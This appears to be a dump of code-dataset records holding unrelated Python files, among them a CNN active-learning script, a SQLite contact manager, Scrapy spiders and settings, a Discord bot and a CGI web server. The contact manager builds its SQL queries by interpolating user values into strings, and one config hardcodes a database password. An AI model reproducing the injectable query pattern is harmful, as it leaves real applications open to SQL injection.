Delta[X_train_Temp.shape[0]:, 0:X_train_Temp.shape[0]]\n\t\tDelta_lu = Delta[0:X_train_Temp.shape[0], X_train_Temp.shape[0]:]\n\t\tDelta_uu = Delta[X_train_Temp.shape[0]:, X_train_Temp.shape[0]:]\n\n\n\t\t#compute the new changed f\n\t\tinv_Delta_uu = linalg.inv(Delta_uu)\n\t\tf_L = y_train_Temp\n\t\tDelta_mult = np.dot(inv_Delta_uu, Delta_ul)\n\t\tf_U = - np.dot(Delta_mult, f_L)\t\t\t\n\t\tf_I = np.concatenate((f_L, f_U), axis=0)\n\n\t\t#compute the new estimated Bayes risk for this added point\n\t\tR = np.array([0])\n\t\tfor m in range(f_I.shape[0]):\n\t\t\tval_f_I = f_I[m]\n\t\t\tother_val_f_I = 1 - val_f_I\n\t\t\tmin_val 
= np.amin(np.array([val_f_I, other_val_f_I]))\n\t\t\tR = R + min_val\n\t\tEstimated_Risk = R\n\n\n\t\t#we need f_k values for each pool point in consideration\n\t\tf_All_Pool = Original_f_I[Original_f_L.shape[0]:]\n\t\tf_k = f_All_Pool[k]\n\n\t\t# f_All_Pool = f_I[f_L.shape[0]:]\n\t\t# f_k = f_All_Pool[k]\n\n\t\tBayes_Risk[k] = (1 - f_k) * Estimated_Risk + (f_k)*Estimated_Risk\n\n\tprint('Finished Computing Bayes Risk for Unlabelled Pool Points')\n\n\t#find the best query from the Bayes_Risk - do the acquisition\t\n\t# THIS FINDS THE INDEX OF THE MINIMUM\n\tb_1d = Bayes_Risk.flatten()\n\tx_pool_index = b_1d.argsort()[:Query]\n\n\n\n\t#find the query point x_pool_index from Pool Set and its original label\n\tPooled_X = X_Pool[x_pool_index, :, :, :]\n\tPooled_Y = y_Pool[x_pool_index]\t\t# true label from the oracle\n\n\t#add queried point to train set and remove from pool set\n\tprint('Acquired points added to training set')\n\tX_train = np.concatenate((X_train, Pooled_X), axis=0)\n\ty_train = np.concatenate((y_train, Pooled_Y), axis=0)\n\n\t#delete the currently pooled points from the pool set\n\tX_Pool = np.delete(X_Pool, x_pool_index, 0)\n\n\n\tprint('Training Model with pooled points')\n\n\t# convert class vectors to binary class matrices\n\tY_train = np_utils.to_categorical(y_train, nb_classes)\n\n\tmodel = Sequential()\n\tmodel.add(Convolution2D(nb_filters, nb_conv, nb_conv, border_mode='valid', input_shape=(1, img_rows, img_cols)))\n\tmodel.add(Activation('relu'))\n\tmodel.add(Convolution2D(nb_filters, nb_conv, nb_conv))\n\tmodel.add(Activation('relu'))\n\tmodel.add(MaxPooling2D(pool_size=(nb_pool, nb_pool)))\n\tmodel.add(Dropout(0.25))\n\n\tmodel.add(Flatten())\n\tmodel.add(Dense(128))\n\tmodel.add(Activation('relu'))\n\tmodel.add(Dropout(0.5))\n\tmodel.add(Dense(nb_classes))\n\tmodel.add(Activation('softmax'))\n\n\tmodel.compile(loss='categorical_crossentropy', optimizer='adam')\n\thist = model.fit(X_train, Y_train, batch_size=batch_size, nb_epoch=nb_epoch, show_accuracy=True, verbose=1, validation_data=(X_valid, Y_valid))\n\tTrain_Result_Optimizer = hist.history\n\tTrain_Loss = np.asarray(Train_Result_Optimizer.get('loss'))\n\tTrain_Loss = np.array([Train_Loss]).T\n\tValid_Loss = np.asarray(Train_Result_Optimizer.get('val_loss'))\n\tValid_Loss = np.asarray([Valid_Loss]).T\n\n\t#Accumulate the training and validation/test loss after every pooling iteration - for plotting\n\tPool_Valid_Loss = np.append(Pool_Valid_Loss, Valid_Loss, axis=1)\n\tPool_Train_Loss = np.append(Pool_Train_Loss, Train_Loss, axis=1)\t\n\n\n\tprint('Evaluate Model Test Accuracy with pooled points')\n\n\tscore, acc = model.evaluate(X_test, Y_test, show_accuracy=True, verbose=0)\n\tprint('Test score:', score)\n\tprint('Test accuracy:', acc)\n\tall_accuracy = np.append(all_accuracy, acc)\n\n\nnp.save('Accuracy_MBR.npy', all_accuracy)\nnp.save('Train_Loss_MBR.npy', Pool_Train_Loss)\nnp.save('Valid_Loss_MBR.npy', Pool_Valid_Loss)\n\nprint('FINISHED')\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"ConvNets/active_learning/Acquisition_Functions/SSL_Minimum_Bayes_Risk/trial_minimum_bayes_risk.py","file_name":"trial_minimum_bayes_risk.py","file_ext":"py","file_size_in_byte":10338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"}
{"seq_id":"437908464","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# import time\nimport gevent\nfrom gevent import monkey, time\nmonkey.patch_all()\n\n\ndef func1():\n    print(123)\n    time.sleep(3)\n    print(456)\n\n\ndef func2():\n    
print('---------')\n time.sleep(1)\n print('=========')\n\n\ng1 = gevent.spawn(func1)\ng2 = gevent.spawn(func2)\ngevent.joinall([g1, g2])\nprint('main')\n","sub_path":"036 协程/3.gevent模块.py","file_name":"3.gevent模块.py","file_ext":"py","file_size_in_byte":357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"457096044","text":"from PythonApplication2.AOne_Mobile_Services.Contact import Contact\nimport sqlite3\n\n\ndef execute_query(query):\n con = None\n data = None\n try:\n con = sqlite3.connect('contact_app.db')\n cur = con.cursor()\n cur.execute(query)\n data = cur.fetchall()\n if not data:\n con.commit()\n except sqlite3.Error as e:\n print(\"Database error: %s\" % e)\n except Exception as e:\n print(\"Exception in _query: %s\" % e)\n finally:\n if con:\n con.close()\n return data\n\n\nclass ContactDBApp:\n\n def __init__(self):\n pass\n\n def add_contact(self, contact):\n if self.check_if_contact_exist(contact):\n return False\n else:\n query = f\"INSERT INTO contact_app VALUES ('{contact.get_name()}',\" \\\n f\" '{contact.get_type_of_contact()}', '{contact.get_phone_call()}')\"\n execute_query(query)\n return True\n\n def update_contact(self, contact):\n if self.check_if_contact_exist(contact):\n query = f\"update contact_app set name= '{contact.get_name()}', \" \\\n f\"type_of_contact='{contact.get_type_of_contact()}'\" \\\n f\", phone_call= '{contact.get_phone_call()}' where name='{contact.get_name()}'\"\n execute_query(query)\n return True\n else:\n return False\n\n def delete_contact(self, contact):\n if self.check_if_contact_exist(contact):\n query = f\"delete from contact_app where name= '{contact.get_name()}'\"\n execute_query(query)\n return True\n else:\n return False\n\n def find_contact_by_name(self, contact):\n query = f\"select * from contact_app where name= '{contact.get_name()}'\"\n\n return execute_query(query)\n\n def find_all_contact(self):\n query = \"select * from contact_app\"\n return execute_query(query)\n\n def check_if_contact_exist(self, contact):\n if self.find_contact_by_name(contact):\n return True\n else:\n return False\n\n\n\n# Create table\n\"\"\"\nc.execute('''CREATE TABLE contact_app\n (name text, type_of_contact text, phone_call text)''')\n\"\"\"\n","sub_path":"projects/PythonScripts/Proyect/AOne_Mobile_Services/DBConection.py","file_name":"DBConection.py","file_ext":"py","file_size_in_byte":2225,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"62454827","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n'''Author: Ting\nweb_crawler'''\n\nfrom selenium import webdriver\nfrom datetime import datetime\n\ndef parse_fcn(self, response): \n # self.driver = webdriver.Firefox()\n # self.driver.get(response.url)\n\n for quote in response.css(\"div.quote\"):\n yield {\n 'text': quote.css(\"span.text::text\").extract_first(),\n 'author': quote.css(\"small.author::text\").extract_first(),\n 'tags': quote.css(\"div.tags > a.tag::text\").extract()\n }\n\n # while True:\n # next = self.driver.find_element_by_xpath('//td[@class=\"pagn-next\"]/a')\n\n # try:\n # next.click()\n\n # # get the data and write it to scrapy items\n # yield get_bs_data() if self.bs else get_scrapy_data()\n # except:\n # break\n\n # self.driver.close()\n\ndef log_data(self, item):\n # Make sure the values are in order\n args_list = [item['text']]\n args_list.append(item['author'])\n args_list.append(item['tags'])\n args_list.append(datetime.now())\n # args_str = 
','.join(cur.mogrify(\"(%s,%s,%s,%s)\", x) for x in args_dict)\n    args_str = self.cur.mogrify(\"(%s,%s,%s,%s)\", args_list)\n    self.cur.execute(\"INSERT INTO test_db (text, author, tags, log_ts) VALUES \" + args_str) \n\nCONFIG = {'start_urls': ('http://quotes.toscrape.com/',),\n\t\t 'parse_fcn': parse_fcn, \n\t\t 'db_info': 'dbname=test_db host=localhost user=test_usr password=lololol', \n\t\t 'log_data': log_data\n\t\t }\n","sub_path":"Kagizume/Kagizume/spiders/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1510,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"}
{"seq_id":"544428761","text":"import json\nimport os\nimport re\n\nfrom telethon.events import CallbackQuery\n\nfrom userbot import wolfub\n\n\n@wolfub.tgbot.on(CallbackQuery(data=re.compile(b\"hide_(.*)\")))\nasync def on_plug_in_callback_query_handler(event):\n    timestamp = int(event.pattern_match.group(1).decode(\"UTF-8\"))\n    if os.path.exists(\"./userbot/hide.txt\"):\n        jsondata = json.load(open(\"./userbot/hide.txt\"))\n        try:\n            reply_pop_up_alert = jsondata[f\"{timestamp}\"][\"text\"]\n        except KeyError:\n            reply_pop_up_alert = \"This message no longer exists in wolfub server\"\n    else:\n        reply_pop_up_alert = \"This message no longer exists \"\n    await event.answer(reply_pop_up_alert, cache_time=0, alert=True)\n","sub_path":"userbot/assistant/hide.py","file_name":"hide.py","file_ext":"py","file_size_in_byte":715,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"}
{"seq_id":"243023453","text":"\r\n#Diana Valeria Deanda Avalos.\r\n#Gir0141\r\n#September 17, 2019\r\n#List\r\n\r\ngrupo = []\r\n\r\nfor i in range (1,6):\r\n    name = input (\"Enter your group: \")\r\n    grupo.append(name)\r\nprint (\"\")\r\n\r\n\r\ncontador = 1\r\nfor k in grupo:\r\n    print (contador, \"Group:\", k)\r\n    contador = contador + 1\r\n\r\nprint (\"\")\r\nfor i in reversed(grupo):\r\n    print (i)\r\n\r\n\r\ndel grupo [0]\r\ndel grupo [0]\r\nprint (\"\")\r\n\r\nprint (grupo)\r\n\r\nprint (\"\")\r\n\r\n\r\n\r\n#Dictionary\r\n\r\ngrupos = {}\r\n\r\nfor i in range ( 0 , 5 ):\r\n    nombre = input ( \" Please enter your name: \" )\r\n    grupo1 = input ( \" Enter your group: \" )\r\n    grupos.update ({grupo1: nombre})\r\n    \r\n\r\nfor e in grupos:\r\n    print (e,grupos[e].upper())\r\nprint()\r\n\r\nfor h in grupos:\r\n    print (h,grupos[h].lower())\r\nprint()\r\n\r\ngrupos.clear()\r\nprint(grupos)\r\n","sub_path":"unidad_1/ejercicios/diccionario_02/dic02_DianaValeriaDeandaAvalos.py","file_name":"dic02_DianaValeriaDeandaAvalos.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"}
{"seq_id":"363559414","text":"import discord, asyncio, time, datetime, random, json, aiohttp, logging, os\nfrom discord.ext import commands\nfrom time import ctime\nfrom os import listdir\nfrom os.path import isfile, join\n\nlst = [f for f in listdir(\"cogs/\") if isfile(join(\"cogs/\", f))]\nno_py = [s.replace('.py', '') for s in lst]\nstartup_extensions = [\"cogs.\" + no_py for no_py in no_py]\n\nwith open(\"databases/thesacredtexts.json\") as f:\n    config = json.load(f)\n\nbot = commands.AutoShardedBot(command_prefix=commands.when_mentioned_or(\"$\"),\n                              owner_id=276707898091110400,\n                              case_insensitive=True)\n\nbot.remove_command(\"help\")\nbot.launch_time = datetime.datetime.utcnow()\n\nurl = \"https://discordbots.org/api/bots/320590882187247617/stats\"\nheaders = {\"Authorization\" : 
config[\"tokens\"][\"dbltoken\"]}\n\ndef is_owner(ctx):\n if ctx.message.author.id == bot.owner_id:\n return True\n return False\n\nasync def fetch(session, url):\n async with session.get(url) as response:\n return await response.text()\n\nasync def update_activity():\n await bot.change_presence(\n activity=discord.Activity(\n name=f\"@Spectrum help | {len(bot.guilds)} guilds!\",\n type=1,\n url=\"https://www.twitch.tv/SpectrixYT\"))\n\n payload = {\"server_count\" : len(bot.guilds)}\n\n async with aiohttp.ClientSession() as aioclient:\n await aioclient.post(\n url,\n data=payload,\n headers=headers)\n\n@bot.event\nasync def on_ready():\n print(\"=========\\nConnected\\n=========\\n\")\n await update_activity()\n\n@bot.event\nasync def on_message(message):\n if message.author.bot:\n return\n await bot.process_commands(message)\n\n@bot.command()\nasync def uptime(ctx):\n delta_uptime = datetime.datetime.utcnow() - bot.launch_time\n hours, remainder = divmod(int(delta_uptime.total_seconds()), 3600)\n minutes, seconds = divmod(remainder, 60)\n days, hours = divmod(hours, 24)\n await ctx.send(f\"{days}d, {hours}h, {minutes}m, {seconds}s\")\n\n@bot.event\nasync def on_guild_join(guild):\n await update_activity()\n try:\n embed = discord.Embed(color=discord.Color(value=0x36393e))\n embed.set_author(name=\"Here's some stuff to get you started:\")\n embed.add_field(name=\"Prefix\", value=\"`$`, or **just mention me!**\")\n embed.add_field(name=\"Command help\", value=\"[Documentation](https://spectrix.me/spectrum/)\")\n embed.add_field(name=\"Support Server\", value=\"[Join, it's quite fun here](https://discord.gg/SuN49rm)\")\n embed.add_field(name=\"Upvote\", value=\"[Click here](https://discordbots.org/bot/320590882187247617/vote)\")\n embed.set_thumbnail(url=config[\"styling\"][\"gifLogo\"])\n embed.set_footer(text=f\"Thanks to you, Spectrum is now on {len(bot.guilds)} servers! <3\", icon_url=config[\"styling\"][\"normalLogo\"])\n await guild.system_channel.send(content=\"**Hello World! Thanks for inviting me! 
:wave: **\", embed=embed)\n except Exception:\n pass\n\n@bot.event\nasync def on_guild_remove(guild):\n await update_activity()\n\nif __name__ == '__main__':\n\n for extension in startup_extensions:\n bot.load_extension(extension)\n\n bot.run(config[\"tokens\"][\"token\"])","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":3254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"467639822","text":"# -*- coding: utf-8 -*-\nimport logging\n\nfrom contrib.requesthandlers import RequestHandlerBase\nfrom projects.functions import * \nfrom users.models import User\n\nclass CreateProjectRequestHandler(RequestHandlerBase):\n \"\"\"Request handler for creating projects.\"\"\"\n \n def get(self):\n users = User.all()\n context = {\n 'users': users,\n }\n self.render_to_response('projects/create.html', context)\n \n def post(self):\n project = create_project(self.request) \n if project is not None:\n self.redirect('/projects/'+str(project.key().id()))\n else:\n self.error(404)\n \nclass ShowProjectRequestHandler(RequestHandlerBase):\n \"\"\"Display project.\"\"\"\n \n def get(self, project_id):\n project = get_project(project_id)\n context = {'project': project}\n self.render_to_response('projects/show.html', context)\n \nclass EditProjectRequestHandler(RequestHandlerBase):\n \"\"\"Edit project.\"\"\"\n \n def get(self, project_id):\n project = get_project(project_id)\n users = User.all()\n context = {\n 'project': project,\n 'users': users,\n }\n self.render_to_response('projects/edit.html', context)\n \n def post(self, project_id):\n project = update_project(self.request, project_id) \n if project is not None:\n self.redirect('/projects/'+str(project.key().id()))\n else:\n self.error(404)\n \nclass ListProjectsRequestHandler(RequestHandlerBase):\n \"\"\"List projects.\"\"\"\n \n def get(self):\n projects = list_projects()\n context = {\n 'projects': projects\n }\n self.render_to_response('projects/list.html', context)\n","sub_path":"projects/requesthandlers.py","file_name":"requesthandlers.py","file_ext":"py","file_size_in_byte":1766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"434343399","text":"#/usr/bin/python3\n\nimport xml.etree.ElementTree as ET\nfrom xml.etree.ElementTree import ElementTree,Element \n\nfrom xml.dom import minidom\nfrom pathlib import Path\nimport argparse\nimport re\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--pmid\", default=\"21775823\")\nargs = parser.parse_args()\npmid = args.pmid\n\nresultInBioc = \"/home/laboratory/lab/BioCreative/2017/BC6/testResult/\" + pmid + \".xml\"\nresultInPubt = \"/home/laboratory/lab/BioCreative/2017/BC6/testResult/\" + pmid + \".pubtator\"\ntre = ET.parse(resultInBioc)\nroot = tre.getroot()\n\npmid = \"\"\ntextType = \"\"\ntext = \"\"\nentites = []\ntitle = \"\"\nabstract = \"\"\nrelations = []\nfor node in root:\n if node.tag == \"id\":\n pmid = node.text\n if node.tag == \"passage\":\n for anno in node:\n if anno.tag == \"infon\":\n textType = anno.text\n if anno.tag == \"text\":\n text = anno.text\n if anno.tag == 'annotation':\n for att in anno:\n if att.tag == \"infon\" and att.attrib['key'].upper() == \"NCBI GENE\":\n entityId = att.text\n if att.tag == \"location\":\n start = att.attrib[\"offset\"]\n end = str(int(att.attrib[\"length\"]) + int(start))\n if att.tag == \"text\":\n entityMention = att.text\n entites.append(\"\\t\".join([pmid, start, end, entityMention, \"Gene\", 
entityId]))\n    if textType == 'title':\n        title = \"|\".join([pmid, 't', text])\n    if textType == 'abstract':\n        abstract = \"|\".join([pmid, 'a', text])\n    if node.tag == 'relation':\n        # <relation>\n        #     <infon key='Gene1'>851125</infon>\n        #     <infon key='Gene2'>852060</infon>\n        #     <infon key='relation type'>PPIm</infon>\n        # </relation>\n        for infoNode in node:\n            if infoNode.attrib['key'] == \"Gene1\":\n                e1Id = infoNode.text\n            if infoNode.attrib['key'] == \"Gene2\":\n                e2Id = infoNode.text\n        relations.append(\"\\t\".join([pmid, 'PPIm', e1Id, e2Id]))\n\nwith open(resultInPubt, 'w') as f:\n    f.write(title + '\\n')\n    f.write(abstract + \"\\n\")\n    f.writelines(\"\\n\".join(entites))\n    f.write(\"\\n\")\n    f.writelines(\"\\n\".join(relations))","sub_path":"postprocessing/xml2Pubtator.py","file_name":"xml2Pubtator.py","file_ext":"py","file_size_in_byte":2288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
{"seq_id":"241417731","text":"import numpy as np,glob\r\n\r\nfile_unique = open('unique.dat','w')\r\nlis_cell = []\r\nucell = []\r\nlis_input = []\r\n\r\ndef extract_cell(fname):\r\n\tfile_cym = open(fname,'r')\r\n\t\r\n\tfor i,line_cym in enumerate(file_cym):\r\n\t\tif i > 0:\r\n\t\t\t#for sar\r\n\t\t\tid,lai,sos,wth,soil = line_cym.strip().split(',')\r\n\t\t\t#for modis\r\n\t\t\t#id,sos,wth,eos,pos,lai1,lai2,lai3,lai4,lai5,lai6,lai7,lai8,lai9,lai10,lai11,lai12,lai13,lai14,lai15,lai16,lai17,lai18,lai19,lai20,lai21,lai22,lai23,lai24,lai25,lai26,lai27,lai28,lai29,lai30,lai31,lai32,lai33,lai34,lai35 = line_cym.strip().split(',')\r\n\t\t\tif id != '0':\r\n\t\t\t\tlis_cell.append(wth)\r\n\r\n\tfile_cym.close()\r\n\r\ndef get_unique():\r\n\tucell = np.unique(lis_cell)\r\n\tfor i,line_cell in enumerate(ucell):\r\n\t\tfile_unique.write(line_cell+'\\n')\r\n\r\n\t#print(ucell)\r\n\tfile_unique.close()\r\n\r\ndef get_diff():\r\n\tfile_icell = open('icell.dat','r')\r\n\tfor line_icell in file_icell:\r\n\t\tlis_input.append(line_icell.strip())\r\n\tfile_icell.close()\r\n\r\n\tdiff1 = np.setdiff1d(lis_input,lis_cell)\r\n\tdiff2 = np.setdiff1d(lis_cell,lis_input)\r\n\r\ndef read_filename():\r\n\tdir = 'E:\\PRISM Weather Data\\2017Sem2_InputCYM-20170814T065626Z-001\\2017Sem2_InputCYM\\Luzon\\*.csv'\r\n\t\r\n\tfor name in glob.glob(dir):\r\n\t\textract_cell(name)\r\n\t\tprint (name)\r\n\t\r\n\tget_unique()\r\n\t#get_diff()\r\n\r\nif __name__=='__main__':\r\n\tread_filename()","sub_path":"extract_unique_wth.py","file_name":"extract_unique_wth.py","file_ext":"py","file_size_in_byte":1301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
{"seq_id":"21472860","text":"\n\n#class header\nclass _KIDNAP():\n\tdef __init__(self): \n\t\tself.name = \"KIDNAP\"\n\t\tself.definitions = [u'to take a person away illegally by force, usually in order to demand money in exchange for releasing them: ']\n\n\t\tself.parents = []\n\t\tself.children = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'verbs'\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/verbs/_kidnap.py","file_name":"_kidnap.py","file_ext":"py","file_size_in_byte":386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
{"seq_id":"607669462","text":"# coding=utf-8\n\nfrom TestUI.GUI.controller.main import UiMainWindow\nfrom TestUI.GUI.controller.Passwd import EnterPwd\nfrom TestUI.GUI.controller.Loop import Loop_Frame\n# from TestUI.GUI.controller.ScriptEditor import InformGui\nfrom TestUI.GUI.controller.SettingPwd import SetPwd\nfrom PyQt5.QtCore import pyqtSignal, 
QObject\nfrom Common.rpc_client import RPCClientWrapper\nimport zmq\nimport Common.zmqports as zmqports\nfrom Common.publisher import ZmqPublisher\n\n\nclass GuiManager(QObject):\n \"\"\"docstring for GuiManager\"\"\"\n sigOut = pyqtSignal(dict)\n\n def __init__(self, UpdateUI, DeleteUI):\n super(GuiManager, self).__init__()\n self.UpdateUI = UpdateUI\n self.DeleteUI = DeleteUI\n self.frameDict = {} # used to upload the frame\n self.parent = None\n\n sm_proxy = RPCClientWrapper('tcp://localhost' + ':' + str(zmqports.SM_PORT),\n ZmqPublisher(zmq.Context().instance(),\n \"tcp://*:\" + str(zmqports.SM_PROXY_PUB), 'SMProxy'))\n self.sm_remote = sm_proxy.remote_server()\n\n def GetFrame(self, tp):\n frame = self.frameDict.get(tp)\n if frame is None:\n frame = self.CreateFrame(tp)\n self.frameDict[tp] = frame\n return frame\n\n def CreateFrame(self, tp):\n if tp == 0:\n self.parent = UiMainWindow(parent=None, UpdateUI=self.UpdateUI, sm_remote=self.sm_remote)\n return self.parent\n elif tp == 1:\n return Loop_Frame(parent=self.parent, UpdateUI=self.UpdateUI, DeleteUI=self.DeleteUI,\n sm_remote=self.sm_remote)\n elif tp == 2:\n return EnterPwd(parent=self.parent, UpdateUI=self.UpdateUI, DeleteUI=self.DeleteUI)\n # elif tp ==3:\n # return InformGui(parent=self.parent,UpdateUI=self.UpdateUI,DeleteUI=self.DeleteUI)\n elif tp == 4:\n return SetPwd(parent=self.parent, UpdateUI=self.UpdateUI, DeleteUI=self.DeleteUI)\n\n def DeleateFrame(self, tp):\n frame = self.frameDict.get(tp)\n if frame is None:\n return None\n else:\n self.frameDict.pop(tp)\n return True\n","sub_path":"Prm.app/Contents/MacOS/prmtester/TestUI/GUI/controller/guiManager.py","file_name":"guiManager.py","file_ext":"py","file_size_in_byte":2208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"326844984","text":"# -*- coding: utf-8 -*-\n\n# Scrapy settings for yp project\n#\n# For simplicity, this file contains only settings considered important or\n# commonly used. 
You can find more settings consulting the documentation:\n#\n# http://doc.scrapy.org/en/latest/topics/settings.html\n# http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html\n# http://scrapy.readthedocs.org/en/latest/topics/spider-middleware.html\n\nBOT_NAME = 'yp'\n\nSPIDER_MODULES = ['yp.spiders']\nNEWSPIDER_MODULE = 'yp.spiders'\n\n# ITEM_PIPELINES = {'yp.pipelines.YpPipeline': 300 }\nFEED_EXPORTERS = {\n 'csv': 'yp.csv_item_exporter.MyProjectCsvItemExporter',\n}\nFIELDS_TO_EXPORT = ['Company_Name', 'Logo', 'Company_Type', 'Industry', 'Employees', 'Annual_Revenue', 'Currency',\n 'Comment', 'Responsible_person',\n 'Address', 'Street', 'Apartment_Suite', 'City', 'Region', 'State_Province', 'Zip', 'Country',\n 'Billing_Address', 'Street_billing', 'Apartment_Suite_billing',\n 'City_billing', 'Region Billing', 'State_Province_billing', 'Zip_billing', 'Country_billing',\n 'Work_Phone', 'Mobile', 'Fax', 'Home_phone', 'Pager_Number', 'Other_Phone_Number',\n 'Corporate_Website',\n 'Personal_Page', 'Facebook_Page', 'LiveJournal', 'Twitter', 'Other_Website', 'Work_Email',\n 'Home_Email', 'Other_Email', 'Facebook_account', 'Telegram_account',\n 'VK_account', 'Skype_ID', 'Bitrix24_Network_account', 'Open_Channel_account', 'ICQ_Number',\n 'MSN_Live', 'Jabber', 'Other_Contact', 'Payment_Details', 'Available_to_everyone', 'Seller']\nCSV_DELIMITER = \";\"\n\nROBOTSTXT_OBEY = True\n# ITEM_PIPELINES = {'scrapy.pipelines.images.ImagesPipeline': 1}\n#\n# IMAGE_STORE = 'images'\n# Crawl responsibly by identifying yourself (and your website) on the user-agent\n# USER_AGENT = 'yp (+http://www.yourdomain.com)'\n\n# Configure maximum concurrent requests performed by Scrapy (default: 16)\n# CONCURRENT_REQUESTS=16\n\n# Configure a delay for requests for the same website (default: 0)\n# See http://scrapy.readthedocs.org/en/latest/topics/settings.html#download-delay\n# See also autothrottle settings and docs\nDOWNLOAD_DELAY=3\n# The download delay setting will honor only one of:\n# CONCURRENT_REQUESTS_PER_DOMAIN=16\n# CONCURRENT_REQUESTS_PER_IP=16\n\n# Disable cookies (enabled by default)\n# COOKIES_ENABLED=False\n\n# Disable Telnet Console (enabled by default)\n# TELNETCONSOLE_ENABLED=False\n\n# Override the default request headers:\n# DEFAULT_REQUEST_HEADERS = {\n# 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',\n# 'Accept-Language': 'en',\n# }\n\n# Enable or disable spider middlewares\n# See http://scrapy.readthedocs.org/en/latest/topics/spider-middleware.html\n# SPIDER_MIDDLEWARES = {\n# 'yp.middlewares.MyCustomSpiderMiddleware': 543,\n# }\n\n# Enable or disable downloader middlewares\n# See http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html\n# DOWNLOADER_MIDDLEWARES = {\n# 'yp.middlewares.MyCustomDownloaderMiddleware': 543,\n# }\n\n# Enable or disable extensions\n# See http://scrapy.readthedocs.org/en/latest/topics/extensions.html\n# EXTENSIONS = {\n# 'scrapy.telnet.TelnetConsole': None,\n# }\n\n# Configure item pipelines\n# See http://scrapy.readthedocs.org/en/latest/topics/item-pipeline.html\n\n# Enable and configure the AutoThrottle extension (disabled by default)\n# See http://doc.scrapy.org/en/latest/topics/autothrottle.html\n# NOTE: AutoThrottle will honour the standard settings for concurrency and delay\n# AUTOTHROTTLE_ENABLED=True\n# The initial download delay\n# AUTOTHROTTLE_START_DELAY=5\n# The maximum download delay to be set in case of high latencies\n# AUTOTHROTTLE_MAX_DELAY=60\n# Enable showing throttling stats for every 
response received:\n# AUTOTHROTTLE_DEBUG=False\n\n# Enable and configure HTTP caching (disabled by default)\n# See http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html#httpcache-middleware-settings\n# HTTPCACHE_ENABLED=True\n# HTTPCACHE_EXPIRATION_SECS=0\n# HTTPCACHE_DIR='httpcache'\n# HTTPCACHE_IGNORE_HTTP_CODES=[]\n# HTTPCACHE_STORAGE='scrapy.extensions.httpcache.FilesystemCacheStorage'\n","sub_path":"yp/yp/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":4233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"302428852","text":"\"\"\"\nA web server implementation in Python that is able to run\nserver-side CGI scripts written in Python; it serves the files and\nscripts in the current working directory; the Python scripts\nmust live in the webdir\\\cgi-bin or webdir\\\htbin directory\n\"\"\"\n\nfrom http.server import HTTPServer, CGIHTTPRequestHandler\nimport os\n\n\nwebdir = '.' # location of the HTML files and the cgi-bin script directory\nport = 8080 # defaults to http://localhost/,\n# otherwise use http://localhost:xxxx/\nos.chdir(webdir) # run from the HTML root directory\nsrvraddr = '', port # host name and port number\nsrvrobj = HTTPServer(srvraddr, CGIHTTPRequestHandler)\nsrvrobj.serve_forever() # run as an endless background process\n","sub_path":"Examples/Preview/webserver.py","file_name":"webserver.py","file_ext":"py","file_size_in_byte":1067,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"584693623","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n# Filename: astfam.py\n# author: Pedro Henrique A. Hasselmann\n# date: August 2012\n\n# Written in Python 3 style while running under Python 2.6:\nfrom __future__ import print_function, unicode_literals, absolute_import, division\n\nfrom os import path\n\nhome = path.expanduser(\"~\")\n\nclass AsteroidFamilyStats:\n    __version__ = 0.9\n\n    '''\n    Statistical Work with Asteroid Families.\n    Magnitude and albedo taken from Nesvorny Asteroid Families (PDS Dataset).\n    Taxonomic Classifications are taken from Carvano et al. 
(2010).\n    Geometric albedos are from preliminary data provided by NEOWISE.\n    '''\n##################################### INITIALIZATION\n    def __init__(self,famfile=\"101_vesta\"):\n\n        self.paths = list()\n\n        self.paths.append(path.join(home,\"Projetos\",\"Taxonomia SDSS\",\"PDS Archiving\",\"\"))\n        self.paths.append(path.join(home,\"Dados\",\"Catalogos\",\"\"))\n\n        #print(\"initialization.....OK.\")\n\n##################################### LOAD MEMBERS AND MAGNITUDE\n        import zipfile\n\n        '''\n        Load Nesvorny families from a zipped file.\n        Make a dictionary of magnitudes of each member.\n        '''\n\n        # open Nesvorny Families:\n        with zipfile.ZipFile(self.paths[-1]+\"NESVORNY_FAMILIES_V2_0.zip\", \"r\") as nesvorny_fam:\n            fam = nesvorny_fam.open(path.join(\"EAR_A_VARGBDET_5_NESVORNYFAM_V2_0\",\"data\",\"families\",\"\")+famfile+\".tab\").readlines()\n            members = [ID[7:13].strip() if int(ID[7:13]) != 0 else ID[14:24].strip() for ID in fam]\n            magnitudes = [float(mag[53:58]) for mag in fam]\n            